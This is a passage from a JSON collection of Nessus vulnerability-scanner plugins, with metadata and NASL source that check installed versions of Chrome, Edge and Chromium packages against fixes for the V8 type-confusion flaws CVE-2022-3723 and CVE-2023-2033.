107.0.1418.26. It is, therefore, affected\nby a vulnerability as referenced in the October 31, 2022 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#october-31-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff54e40b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 107.0.1418.26 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '106.0.1370.61', 'fixed_display' : '106.0.1370.61 (Extended Stable Channel) / 107.0.1418.26 (Stable Channel)' },\n { 'min_version' : '107.0.1418.24', 'fixed_version' : '107.0.1418.26' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:57", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 6f0327d4-9902-4042-9b68-6fc2266944bc advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-15T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (6f0327d4-9902-4042-9b68-6fc2266944bc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_6F0327D4990240429B686FC2266944BC.NASL", "href": "https://www.tenable.com/plugins/nessus/174390", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174390);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (6f0327d4-9902-4042-9b68-6fc2266944bc)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 6f0327d4-9902-4042-9b68-6fc2266944bc advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n # https://vuxml.freebsd.org/freebsd/6f0327d4-9902-4042-9b68-6fc2266944bc.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ec7620dc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<112.0.5615.121',\n 'ungoogled-chromium<112.0.5615.121'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:06", "description": "The version of Google Chrome installed on the remote macOS host is prior to 107.0.5304.87. It is, therefore, affected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-27T00:00:00", "type": "nessus", "title": "Google Chrome < 107.0.5304.87 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_107_0_5304_87.NASL", "href": "https://www.tenable.com/plugins/nessus/166630", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166630);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Google Chrome < 107.0.5304.87 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 107.0.5304.87. It is, therefore, affected by\na vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1378239\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 107.0.5304.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'107.0.5304.87', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:06", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5263 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-30T00:00:00", "type": "nessus", "title": "Debian DSA-5263-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:11.0", "p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-shell", "p-cpe:/a:debian:debian_linux:chromium-sandbox"], "id": "DEBIAN_DSA-5263.NASL", "href": "https://www.tenable.com/plugins/nessus/166704", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5263. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166704);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Debian DSA-5263-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5263\nadvisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5263\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-3723\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 107.0.5304.87-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '107.0.5304.87-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '107.0.5304.87-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n 
security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:56", "description": "The version of Google Chrome installed on the remote Windows host is prior to 107.0.5304.87/.88. It is, therefore, affected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-27T00:00:00", "type": "nessus", "title": "Google Chrome < 107.0.5304.87/.88 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-21T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_107_0_5304_87.NASL", "href": "https://www.tenable.com/plugins/nessus/166631", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166631);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/21\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Google Chrome < 107.0.5304.87/.88 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 107.0.5304.87/.88. It is, therefore,\naffected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1378239\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 107.0.5304.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'107.0.5304.87', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:55:58", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 1225c888-56ea-11ed-b5c3-3065ec8fd3ec advisory.\n\n - Type Confusion in V8. 
(CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-28T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- Type confusion in V8 (1225c888-56ea-11ed-b5c3-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_1225C88856EA11EDB5C33065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/166701", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166701);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"FreeBSD : chromium -- Type confusion in V8 (1225c888-56ea-11ed-b5c3-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 1225c888-56ea-11ed-b5c3-3065ec8fd3ec advisory.\n\n - Type Confusion in V8. 
(CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n # https://vuxml.freebsd.org/freebsd/1225c888-56ea-11ed-b5c3-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?129bfb6c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/28\");\n 